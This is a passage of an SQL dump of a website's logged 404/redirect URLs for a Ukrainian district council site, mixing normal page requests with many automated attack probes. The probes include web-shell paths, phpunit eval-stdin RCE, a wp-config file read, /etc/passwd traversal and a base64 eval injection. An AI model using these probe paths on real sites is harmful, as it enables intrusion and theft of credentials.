08:35:24','0000-00-00 00:00:00',301),(34004,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/class_akismet.php',NULL,'','',1,0,'2019-11-15 08:35:25','0000-00-00 00:00:00',301),(34005,'https://www.malyn-rayrada.gov.ua/new_license.php',NULL,'','',1,0,'2019-11-15 08:35:28','0000-00-00 00:00:00',301),(34006,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/theme-configurator/mini.php',NULL,'','',1,0,'2019-11-15 08:35:29','0000-00-00 00:00:00',301),(34007,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/widget-logic/mini.php',NULL,'','',1,0,'2019-11-15 08:35:31','0000-00-00 00:00:00',301),(34008,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-admin-manager/up.php',NULL,'','',1,0,'2019-11-15 08:35:33','0000-00-00 00:00:00',301),(34009,'https://www.malyn-rayrada.gov.ua/license.php',NULL,'','',1,0,'2019-11-15 08:35:37','0000-00-00 00:00:00',301),(34010,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/2019/11/content-post.php',NULL,'','',1,0,'2019-11-15 08:35:43','0000-00-00 00:00:00',301),(34011,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/2019/11/new_license.php',NULL,'','',1,0,'2019-11-15 08:35:47','0000-00-00 00:00:00',301),(34012,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/new_up.php',NULL,'','',1,0,'2019-11-15 08:35:50','0000-00-00 00:00:00',301),(34013,'https://www.malyn-rayrada.gov.ua/a.php',NULL,'','',3,0,'2019-11-15 08:35:58','0000-00-00 00:00:00',301),(34014,'https://www.malyn-rayrada.gov.ua/s.php',NULL,'','',3,0,'2019-11-15 08:36:01','0000-00-00 00:00:00',301),(34015,'https://www.malyn-rayrada.gov.ua/x.php',NULL,'','',3,0,'2019-11-15 08:36:03','0000-00-00 00:00:00',301),(34016,'https://www.malyn-rayrada.gov.ua/z.php',NULL,'','',3,0,'2019-11-15 08:36:05','0000-00-00 00:00:00',301),(34017,'https://www.malyn-rayrada.gov.ua/d.php',NULL,'','',3,0,'2019-11-15 08:36:06','0000-00-00 00:00:00',301),(34018,'https://www.malyn-rayrada.gov.ua/o.php',NULL,'','',3,0,'2019-11-15 08:36:07','0000-00-00 00:00:00',301),(34019,'https://www.malyn-rayrada.gov.ua/t.php',NULL,'','',3,0,'2019-11-15 08:36:09','0000-00-00 00:00:00',301),(34020,'https://www.malyn-rayrada.gov.ua/1.php',NULL,'','',3,0,'2019-11-15 08:36:10','0000-00-00 00:00:00',301),(34021,'https://www.malyn-rayrada.gov.ua/w.php',NULL,'','',3,0,'2019-11-15 08:36:18','0000-00-00 00:00:00',301),(34022,'https://www.malyn-rayrada.gov.ua/c.php',NULL,'','',3,0,'2019-11-15 08:36:20','0000-00-00 00:00:00',301),(34023,'https://www.malyn-rayrada.gov.ua/y.php',NULL,'','',3,0,'2019-11-15 08:36:22','0000-00-00 00:00:00',301),(34024,'https://www.malyn-rayrada.gov.ua/k.php',NULL,'','',3,0,'2019-11-15 08:36:25','0000-00-00 00:00:00',301),(34025,'https://www.malyn-rayrada.gov.ua/e.php',NULL,'','',3,0,'2019-11-15 08:36:30','0000-00-00 00:00:00',301),(34026,'https://www.malyn-rayrada.gov.ua/m.php',NULL,'','',3,0,'2019-11-15 08:36:31','0000-00-00 00:00:00',301),(34027,'https://www.malyn-rayrada.gov.ua/404.php',NULL,'','',3,0,'2019-11-15 08:36:33','0000-00-00 00:00:00',301),(34028,'https://www.malyn-rayrada.gov.ua/config.php',NULL,'','',3,0,'2019-11-15 08:36:35','0000-00-00 00:00:00',301),(34029,'https://www.malyn-rayrada.gov.ua/wp.php',NULL,'','',3,0,'2019-11-15 08:36:36','0000-00-00 00:00:00',301),(34030,'https://www.malyn-rayrada.gov.ua/cpanel.php',NULL,'','',3,0,'2019-11-15 08:36:37','0000-00-00 00:00:00',301),(34031,'https://www.malyn-rayrada.gov.ua/cp.php',NULL,'','',3,0,'2019-11-15 08:36:40','0000-00-00 00:00:00',301),(34032,'https://www.malyn-rayrada.gov.ua/root.php',NULL,'','',3,0,'2019-11-15 08:36:42','0000-00-00 00:00:00',301),(34033,'https://www.malyn-rayrada.gov.ua/modules/modules/modules.php',NULL,'','',1,0,'2019-11-15 08:36:48','0000-00-00 00:00:00',301),(34034,'https://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',1,0,'2019-11-15 08:36:49','0000-00-00 00:00:00',301),(34035,'https://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',1,0,'2019-11-15 08:36:51','0000-00-00 00:00:00',301),(34036,'https://www.malyn-rayrada.gov.ua/libraries/joomla/css.php',NULL,'','',1,0,'2019-11-15 08:36:54','0000-00-00 00:00:00',301),(34037,'https://www.malyn-rayrada.gov.ua/libraries/joomla/jmails.php?u',NULL,'','',1,0,'2019-11-15 08:36:55','0000-00-00 00:00:00',301),(34038,'https://www.malyn-rayrada.gov.ua/libraries/joomla/jmail.php?u',NULL,'','',1,0,'2019-11-15 08:36:56','0000-00-00 00:00:00',301),(34039,'https://www.malyn-rayrada.gov.ua/rxr.php?rxr',NULL,'','',1,0,'2019-11-15 08:37:09','0000-00-00 00:00:00',301),(34040,'https://www.malyn-rayrada.gov.ua/error.php',NULL,'','',1,0,'2019-11-15 08:37:15','0000-00-00 00:00:00',301),(34041,'https://www.malyn-rayrada.gov.ua/rxr.php',NULL,'','',1,0,'2019-11-15 08:37:16','0000-00-00 00:00:00',301),(34042,'https://www.malyn-rayrada.gov.ua/components/com_b2jcontact/izoc.php',NULL,'','',1,0,'2019-11-15 08:37:19','0000-00-00 00:00:00',301),(34043,'https://www.malyn-rayrada.gov.ua/v3.php',NULL,'','',1,0,'2019-11-15 08:37:21','0000-00-00 00:00:00',301),(34044,'https://www.malyn-rayrada.gov.ua/v5.php',NULL,'','',1,0,'2019-11-15 08:37:22','0000-00-00 00:00:00',301),(34045,'https://www.malyn-rayrada.gov.ua/images/stories/cmd.php',NULL,'','',1,0,'2019-11-15 08:37:23','0000-00-00 00:00:00',301),(34046,'https://www.malyn-rayrada.gov.ua/images/jsspwneed.php',NULL,'','',1,0,'2019-11-15 08:37:25','0000-00-00 00:00:00',301),(34047,'https://www.malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'','',1,0,'2019-11-15 08:37:26','0000-00-00 00:00:00',301),(34048,'https://www.malyn-rayrada.gov.ua/templates/beez/index.php',NULL,'','',1,0,'2019-11-15 08:37:50','0000-00-00 00:00:00',301),(34049,'https://www.malyn-rayrada.gov.ua/templates/ja_purity/index.php',NULL,'','',1,0,'2019-11-15 08:37:51','0000-00-00 00:00:00',301),(34050,'https://www.malyn-rayrada.gov.ua/templates/rhuk_milkyway/index.php',NULL,'','',1,0,'2019-11-15 08:37:52','0000-00-00 00:00:00',301),(34051,'https://www.malyn-rayrada.gov.ua/templates/rada2019yt/error.php',NULL,'','',1,0,'2019-11-15 08:37:53','0000-00-00 00:00:00',301),(34052,'https://www.malyn-rayrada.gov.ua/templates/beez_3/index.php',NULL,'','',1,0,'2019-11-15 08:38:35','0000-00-00 00:00:00',301),(34053,'https://www.malyn-rayrada.gov.ua/uploads/',NULL,'','',1,0,'2019-11-15 08:39:55','0000-00-00 00:00:00',301),(34054,'https://www.malyn-rayrada.gov.ua/img/',NULL,'','',1,0,'2019-11-15 08:39:56','0000-00-00 00:00:00',301),(34055,'https://www.malyn-rayrada.gov.ua/upload/',NULL,'','',1,0,'2019-11-15 08:39:59','0000-00-00 00:00:00',301),(34056,'https://www.malyn-rayrada.gov.ua/gallery/',NULL,'','',1,0,'2019-11-15 08:40:06','0000-00-00 00:00:00',301),(34057,'https://www.malyn-rayrada.gov.ua/files/',NULL,'','',1,0,'2019-11-15 08:40:08','0000-00-00 00:00:00',301),(34058,'https://www.malyn-rayrada.gov.ua/pdf/',NULL,'','',1,0,'2019-11-15 08:40:10','0000-00-00 00:00:00',301),(34059,'https://www.malyn-rayrada.gov.ua/docs/',NULL,'','',1,0,'2019-11-15 08:40:12','0000-00-00 00:00:00',301),(34060,'https://malyn-rayrada.gov.ua//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',3,0,'2019-11-15 16:12:54','0000-00-00 00:00:00',301),(34061,'https://malyn-rayrada.gov.ua//ad.php',NULL,'','',3,0,'2019-11-15 16:13:03','0000-00-00 00:00:00',301),(34062,'https://malyn-rayrada.gov.ua//adm.php',NULL,'','',3,0,'2019-11-15 16:13:08','0000-00-00 00:00:00',301),(34063,'https://malyn-rayrada.gov.ua//connect.php',NULL,'','',3,0,'2019-11-15 16:13:11','0000-00-00 00:00:00',301),(34064,'https://malyn-rayrada.gov.ua//_adminer.php',NULL,'','',3,0,'2019-11-15 16:13:15','0000-00-00 00:00:00',301),(34065,'https://malyn-rayrada.gov.ua//pma.php',NULL,'','',3,0,'2019-11-15 16:13:20','0000-00-00 00:00:00',301),(34066,'https://malyn-rayrada.gov.ua//db.php',NULL,'','',3,0,'2019-11-15 16:13:23','0000-00-00 00:00:00',301),(34067,'https://malyn-rayrada.gov.ua//adminer-4.2.5.php',NULL,'','',3,0,'2019-11-15 16:13:28','0000-00-00 00:00:00',301),(34068,'https://malyn-rayrada.gov.ua//adminer-4.6.2.php',NULL,'','',3,0,'2019-11-15 16:13:32','0000-00-00 00:00:00',301),(34069,'https://malyn-rayrada.gov.ua//adminer-4.3.1.php',NULL,'','',3,0,'2019-11-15 16:13:35','0000-00-00 00:00:00',301),(34070,'https://malyn-rayrada.gov.ua//adminer-4.2.4.php',NULL,'','',3,0,'2019-11-15 16:13:39','0000-00-00 00:00:00',301),(34071,'https://malyn-rayrada.gov.ua//adminer-4.1.0.php',NULL,'','',3,0,'2019-11-15 16:13:42','0000-00-00 00:00:00',301),(34072,'https://malyn-rayrada.gov.ua//adminer-4.2.5-mysql.php',NULL,'','',3,0,'2019-11-15 16:13:46','0000-00-00 00:00:00',301),(34073,'https://malyn-rayrada.gov.ua//adminer-4.6.2-mysql.php',NULL,'','',3,0,'2019-11-15 16:13:49','0000-00-00 00:00:00',301),(34074,'https://malyn-rayrada.gov.ua//adminer-4.3.1-mysql.php',NULL,'','',3,0,'2019-11-15 16:13:53','0000-00-00 00:00:00',301),(34075,'https://malyn-rayrada.gov.ua//adminer-4.2.4-mysql.php',NULL,'','',3,0,'2019-11-15 16:13:58','0000-00-00 00:00:00',301),(34076,'https://malyn-rayrada.gov.ua//adminer-4.1.0-mysql.php',NULL,'','',3,0,'2019-11-15 16:14:01','0000-00-00 00:00:00',301),(34077,'https://www.malyn-rayrada.gov.ua/attachments/article/1975/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',1,0,'2019-11-17 07:05:35','0000-00-00 00:00:00',301),(34078,'https://malyn-rayrada.gov.ua/index.php/979-nastav-rizdvyanij-svyatvechir',NULL,'','',2,0,'2019-11-18 22:31:42','0000-00-00 00:00:00',301),(34079,'https://malyn-rayrada.gov.ua/?id=24161',NULL,'','',1,0,'2019-11-19 16:02:28','0000-00-00 00:00:00',301),(34080,'https://malyn-rayrada.gov.ua/phpmyadmin/scripts/setup.php',NULL,'','',4,0,'2019-11-19 16:46:57','0000-00-00 00:00:00',301),(34081,'https://malyn-rayrada.gov.ua/sadad24',NULL,'','',2,0,'2019-11-19 16:46:59','0000-00-00 00:00:00',301),(34082,'https://malyn-rayrada.gov.ua/index.php/joomla/other-components/registration-form',NULL,'','',14,0,'2019-11-22 10:32:01','0000-00-00 00:00:00',301),(34083,'https://malyn-rayrada.gov.ua/index.php/component/user/register.html',NULL,'','',14,0,'2019-11-22 10:32:07','0000-00-00 00:00:00',301),(34084,'https://malyn-rayrada.gov.ua/index.php/registration/registers',NULL,'','',14,0,'2019-11-22 10:32:08','0000-00-00 00:00:00',301),(34085,'https://malyn-rayrada.gov.ua/registratsiya/registers',NULL,'','',14,0,'2019-11-22 10:32:08','0000-00-00 00:00:00',301),(34086,'https://malyn-rayrada.gov.ua/component/comprofiler/registers.html',NULL,'','',14,0,'2019-11-22 10:32:09','0000-00-00 00:00:00',301),(34087,'https://malyn-rayrada.gov.ua/user/registration',NULL,'','',14,0,'2019-11-22 10:32:09','0000-00-00 00:00:00',301),(34088,'https://malyn-rayrada.gov.ua/component/option,com_comprofiler/task,registers/',NULL,'','',14,0,'2019-11-22 10:32:13','0000-00-00 00:00:00',301),(34089,'https://malyn-rayrada.gov.ua/registration',NULL,'','',20,0,'2019-11-22 10:32:17','0000-00-00 00:00:00',301),(34090,'https://www.malyn-rayrada.gov.ua/attachments/article/2189/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ñ‚ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',1,0,'2019-11-22 19:39:25','0000-00-00 00:00:00',301),(34091,'https://malyn-rayrada.gov.ua/vendor/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-28 22:51:42','0000-00-00 00:00:00',301),(34092,'https://malyn-rayrada.gov.ua/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-28 22:52:10','0000-00-00 00:00:00',301),(34093,'https://malyn-rayrada.gov.ua/lib/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-28 22:53:08','0000-00-00 00:00:00',301),(34094,'https://malyn-rayrada.gov.ua/test/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',6,0,'2019-11-28 22:54:00','0000-00-00 00:00:00',301),(34095,'https://malyn-rayrada.gov.ua/api/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',6,0,'2019-11-28 22:54:16','0000-00-00 00:00:00',301),(34096,'https://malyn-rayrada.gov.ua/index.php/1281-pidvishchennya-pensij-invalidam-iii-grupi-vnaslidok-zagalnogo-zakhvoryuvannya-invalidam-z-ditinstva-ta-dityam-invalidam',NULL,'','',1,0,'2019-11-29 20:47:05','0000-00-00 00:00:00',301),(34097,'https://malyn-rayrada.gov.ua/attachments/article/1788/ñ€ðµð¹ñ‚ð¸ð½ð³ ð¿ðµñ€ñˆðµ ð¿ñ–ð²ñ€ñ–ñ‡ñ‡ñ  2017.pdf',NULL,'','',1,0,'2019-11-30 08:23:23','0000-00-00 00:00:00',301),(34098,'https://malyn-rayrada.gov.ua/wp-admin/wp-hook-ajax.php',NULL,'http://malyn-rayrada.gov.ua/wp-admin/wp-hook-ajax.php','',1,0,'2019-11-30 15:17:25','0000-00-00 00:00:00',301),(34099,'https://malyn-rayrada.gov.ua/wp-hook-ajax.php',NULL,'http://malyn-rayrada.gov.ua/wp-hook-ajax.php','',1,0,'2019-11-30 15:17:27','0000-00-00 00:00:00',301),(34100,'https://malyn-rayrada.gov.ua/wp-load.php?up2018info=f',NULL,'','',1,0,'2019-12-01 07:37:02','0000-00-00 00:00:00',301),(34101,'https://malyn-rayrada.gov.ua/news/',NULL,'','',5,0,'2019-12-03 09:02:07','0000-00-00 00:00:00',301),(34102,'https://malyn-rayrada.gov.ua/wp-content/',NULL,'','',1,0,'2019-12-05 21:00:52','0000-00-00 00:00:00',301),(34103,'https://malyn-rayrada.gov.ua/components/a.php',NULL,'','',1,0,'2019-12-07 08:52:57','0000-00-00 00:00:00',301),(34104,'https://malyn-rayrada.gov.ua/attachments/article/2309/додаток',NULL,'','',1,0,'2019-12-07 17:18:06','0000-00-00 00:00:00',301),(34105,'https://malyn-rayrada.gov.ua/tmp/j.php',NULL,'','',1,0,'2019-12-08 16:35:15','0000-00-00 00:00:00',301),(34106,'https://malyn-rayrada.gov.ua/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2019-12-09 02:25:30','0000-00-00 00:00:00',301),(34107,'https://malyn-rayrada.gov.ua/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 15:17:59','0000-00-00 00:00:00',301),(34108,'https://malyn-rayrada.gov.ua/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../com_fox.php',NULL,'','',1,0,'2019-12-09 15:18:03','0000-00-00 00:00:00',301),(34109,'https://malyn-rayrada.gov.ua/attachments/article/1975/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',1,0,'2019-12-13 17:43:20','0000-00-00 00:00:00',301),(34110,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-11122019-roku/2318-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-malinskogo-rajonu-na-2019-rik',NULL,'https://malyn-rayrada.gov.ua/','',5,0,'2019-12-14 11:39:37','0000-00-00 00:00:00',301),(34111,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2309-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2020-rik',NULL,'','',24,0,'2019-12-14 14:22:07','0000-00-00 00:00:00',301),(34112,'https://malyn-rayrada.gov.ua/index.php/1077-detsentralizatsiya-2015',NULL,'','',1,0,'2019-12-14 18:25:43','0000-00-00 00:00:00',301),(34113,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-11122019-roku/2309-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2020-rik',NULL,'','',1,0,'2019-12-16 09:20:05','0000-00-00 00:00:00',301),(34114,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2318-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-malinskogo-rajonu-na-2019-rik',NULL,'https://www.google.com/','',16,0,'2019-12-16 12:47:20','0000-00-00 00:00:00',301),(34115,'https://malyn-rayrada.gov.ua//old.kurs.com.ua/ua/informer',NULL,'','',1,0,'2019-12-16 22:46:24','0000-00-00 00:00:00',301),(34116,'https://malyn-rayrada.gov.ua/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',14,0,'2019-12-19 13:18:35','0000-00-00 00:00:00',301),(34117,'https://malyn-rayrada.gov.ua/vendor/phpunit/util/php/eval-stdin.php',NULL,'','',3,0,'2019-12-19 13:20:28','0000-00-00 00:00:00',301),(34118,'https://malyn-rayrada.gov.ua/old/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',5,0,'2019-12-19 13:29:15','0000-00-00 00:00:00',301),(34119,'https://malyn-rayrada.gov.ua/wp-content/plugins/mm-plugin/inc/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2019-12-19 13:29:39','0000-00-00 00:00:00',301),(34120,'https://malyn-rayrada.gov.ua/laravel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',7,0,'2019-12-19 13:30:20','0000-00-00 00:00:00',301),(34121,'https://malyn-rayrada.gov.ua/forum.php',NULL,'','',1,0,'2019-12-19 17:26:10','0000-00-00 00:00:00',301),(34122,'https://www.malyn-rayrada.gov.ua/attachments/article/1481/ð¾ð±ñ”ð´ð½ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2019-12-20 17:20:28','0000-00-00 00:00:00',301),(34123,'https://malyn-rayrada.gov.ua/test/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/test/wp-login.php','',2,0,'2019-12-21 15:04:24','0000-00-00 00:00:00',301),(34124,'https://malyn-rayrada.gov.ua/demo/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/demo/wp-login.php','',5,0,'2019-12-21 15:13:21','0000-00-00 00:00:00',301),(34125,'https://malyn-rayrada.gov.ua/server/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/server/wp-login.php','',1,0,'2019-12-21 16:07:37','0000-00-00 00:00:00',301),(34126,'https://malyn-rayrada.gov.ua/forum/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/forum/wp-login.php','',1,0,'2019-12-21 16:18:06','0000-00-00 00:00:00',301),(34127,'https://malyn-rayrada.gov.ua/store/',NULL,'','',3,0,'2019-12-23 01:52:07','0000-00-00 00:00:00',301),(34128,'https://malyn-rayrada.gov.ua/shop/',NULL,'','',3,0,'2019-12-23 01:52:14','0000-00-00 00:00:00',301),(34129,'https://malyn-rayrada.gov.ua/catalog/',NULL,'','',3,0,'2019-12-23 01:52:23','0000-00-00 00:00:00',301),(34130,'https://malyn-rayrada.gov.ua/cart/',NULL,'','',3,0,'2019-12-23 01:52:31','0000-00-00 00:00:00',301),(34131,'https://www.malyn-rayrada.gov.ua/store/',NULL,'','',1,0,'2019-12-23 01:52:38','0000-00-00 00:00:00',301),(34132,'https://www.malyn-rayrada.gov.ua/shop/',NULL,'','',1,0,'2019-12-23 01:52:46','0000-00-00 00:00:00',301),(34133,'https://www.malyn-rayrada.gov.ua/catalog/',NULL,'','',1,0,'2019-12-23 01:52:53','0000-00-00 00:00:00',301),(34134,'https://www.malyn-rayrada.gov.ua/cart/',NULL,'','',1,0,'2019-12-23 01:53:01','0000-00-00 00:00:00',301),(34135,'https://malyn-rayrada.gov.ua/attachments/article/2322/ðÿð’ðÿð“.pdf',NULL,'','',1,0,'2019-12-24 07:17:57','0000-00-00 00:00:00',301),(34136,'https://malyn-rayrada.gov.ua/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',6,0,'2019-12-25 06:19:07','0000-00-00 00:00:00',301),(34137,'https://malyn-rayrada.gov.ua/download.php?file=../../../../../../../../../../../../etc/passwd',NULL,'http://malyn-rayrada.gov.ua/download.php?file=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-27 12:18:23','0000-00-00 00:00:00',301),(34138,'https://www.malyn-rayrada.gov.ua/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',2,0,'2019-12-27 21:04:39','0000-00-00 00:00:00',301),(34139,'https://www.malyn-rayrada.gov.ua/plugins/system/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-12-27 21:05:17','0000-00-00 00:00:00',301),(34140,'https://malyn-rayrada.gov.ua/download.php?f=../../../../../../../../../../../../etc/passwd',NULL,'http://malyn-rayrada.gov.ua/download.php?f=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-28 07:52:17','0000-00-00 00:00:00',301),(34141,'https://malyn-rayrada.gov.ua//index.php/component/users',NULL,'','',9,0,'2019-12-28 08:58:57','0000-00-00 00:00:00',301),(34142,'https://malyn-rayrada.gov.ua/dl.php?f=../../../../../../../../../../../../etc/passwd',NULL,'http://malyn-rayrada.gov.ua/dl.php?f=../../../../../../../../../../../../etc/passwd','',1,0,'2019-12-29 21:56:36','0000-00-00 00:00:00',301),(34143,'https://malyn-rayrada.gov.ua/ad.php',NULL,'','',1,0,'2019-12-29 23:51:19','0000-00-00 00:00:00',301),(34144,'https://malyn-rayrada.gov.ua/adm.php',NULL,'','',1,0,'2019-12-29 23:51:24','0000-00-00 00:00:00',301),(34145,'https://malyn-rayrada.gov.ua/connect.php',NULL,'','',1,0,'2019-12-29 23:51:36','0000-00-00 00:00:00',301),(34146,'https://malyn-rayrada.gov.ua/_adminer.php',NULL,'','',2,0,'2019-12-29 23:51:43','0000-00-00 00:00:00',301),(34147,'https://malyn-rayrada.gov.ua/pma.php',NULL,'','',1,0,'2019-12-29 23:51:53','0000-00-00 00:00:00',301),(34148,'https://malyn-rayrada.gov.ua/db.php',NULL,'','',2,0,'2019-12-29 23:52:05','0000-00-00 00:00:00',301),(34149,'https://malyn-rayrada.gov.ua/_adminer',NULL,'','',1,0,'2019-12-29 23:52:14','0000-00-00 00:00:00',301),(34150,'https://malyn-rayrada.gov.ua/adminer',NULL,'','',1,0,'2019-12-29 23:52:37','0000-00-00 00:00:00',301),(34151,'https://malyn-rayrada.gov.ua/mysql.php',NULL,'','',1,0,'2019-12-29 23:52:44','0000-00-00 00:00:00',301),(34152,'https://malyn-rayrada.gov.ua/adminer-4.6.2.php',NULL,'','',2,0,'2019-12-29 23:53:02','0000-00-00 00:00:00',301),(34153,'https://malyn-rayrada.gov.ua/adminer-4.1.0.php',NULL,'','',1,0,'2019-12-29 23:53:30','0000-00-00 00:00:00',301),(34154,'https://malyn-rayrada.gov.ua/adminer-4.2.5-mysql.php',NULL,'','',2,0,'2019-12-29 23:53:43','0000-00-00 00:00:00',301),(34155,'https://malyn-rayrada.gov.ua/adminer-4.2.4-mysql.php',NULL,'','',2,0,'2019-12-29 23:54:04','0000-00-00 00:00:00',301),(34156,'https://malyn-rayrada.gov.ua/adminer-4.1.0-mysql.php',NULL,'','',1,0,'2019-12-29 23:54:13','0000-00-00 00:00:00',301),(34157,'https://malyn-rayrada.gov.ua/unzipper.php',NULL,'','',1,0,'2019-12-29 23:54:26','0000-00-00 00:00:00',301),(34158,'https://malyn-rayrada.gov.ua/unzip.php',NULL,'','',1,0,'2019-12-29 23:54:33','0000-00-00 00:00:00',301),(34159,'https://malyn-rayrada.gov.ua/searchreplacedb2.php',NULL,'','',1,0,'2019-12-29 23:54:41','0000-00-00 00:00:00',301),(34160,'https://malyn-rayrada.gov.ua/replace.php',NULL,'','',1,0,'2019-12-29 23:54:49','0000-00-00 00:00:00',301),(34161,'https://malyn-rayrada.gov.ua/index.php/1123-20-chervnya-na-malinshchini-pokhovali-geroya-ato-vasilya-baranivskogo',NULL,'','',1,0,'2019-12-31 08:56:40','0000-00-00 00:00:00',301),(34162,'https://malyn-rayrada.gov.ua//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2020-01-01 17:36:32','0000-00-00 00:00:00',301),(34163,'https://www.malyn-rayrada.gov.ua//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-01-01 17:37:36','0000-00-00 00:00:00',301),(34164,'https://malyn-rayrada.gov.ua/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:15','0000-00-00 00:00:00',301),(34165,'https://malyn-rayrada.gov.ua/admin/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:16','0000-00-00 00:00:00',301),(34166,'https://malyn-rayrada.gov.ua/plugins/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:16','0000-00-00 00:00:00',301),(34167,'https://malyn-rayrada.gov.ua/assets/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:17','0000-00-00 00:00:00',301),(34168,'https://malyn-rayrada.gov.ua/admin/editor/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:18','0000-00-00 00:00:00',301),(34169,'https://malyn-rayrada.gov.ua/ckeditor/plugins/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:19','0000-00-00 00:00:00',301),(34170,'https://malyn-rayrada.gov.ua/assets/plugin/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:21','0000-00-00 00:00:00',301),(34171,'https://malyn-rayrada.gov.ua/vendor/kcfinder/upload.php',NULL,'','',2,0,'2020-01-03 00:04:22','0000-00-00 00:00:00',301),(34172,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=різдвяні+картинки&hl=uk&source=sh/x/im',NULL,'','',1,0,'2020-01-05 00:34:54','0000-00-00 00:00:00',301),(34173,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=найкращі+привітання+з+різдвом+христовим&hl=ru-ru&source=sh/x/im',NULL,'','',2,0,'2020-01-05 14:05:27','0000-00-00 00:00:00',301),(34174,'https://malyn-rayrada.gov.ua/components/com_foxcontact/foxcontact.php',NULL,'','',14,0,'2020-01-05 14:52:11','0000-00-00 00:00:00',301),(34175,'https://malyn-rayrada.gov.ua/components/com_b2jcontact/vuln.php',NULL,'','',15,0,'2020-01-05 14:52:13','0000-00-00 00:00:00',301),(34176,'https://malyn-rayrada.gov.ua/jwallpapers_files/plupload/up.php',NULL,'','',14,0,'2020-01-05 14:52:18','0000-00-00 00:00:00',301),(34177,'https://malyn-rayrada.gov.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',14,0,'2020-01-05 14:52:19','0000-00-00 00:00:00',301),(34178,'https://malyn-rayrada.gov.ua/tmp/up.php',NULL,'','',14,0,'2020-01-05 14:52:20','0000-00-00 00:00:00',301),(34179,'https://malyn-rayrada.gov.ua/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',14,0,'2020-01-05 14:52:24','0000-00-00 00:00:00',301),(34180,'https://malyn-rayrada.gov.ua/modules/megamenu/uploadify/up.php',NULL,'','',14,0,'2020-01-05 14:52:25','0000-00-00 00:00:00',301),(34181,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',13,0,'2020-01-05 14:52:27','0000-00-00 00:00:00',301),(34182,'https://malyn-rayrada.gov.ua/.bitcoin/',NULL,'http://malyn-rayrada.gov.ua/.bitcoin/','',1,0,'2020-01-05 21:27:53','0000-00-00 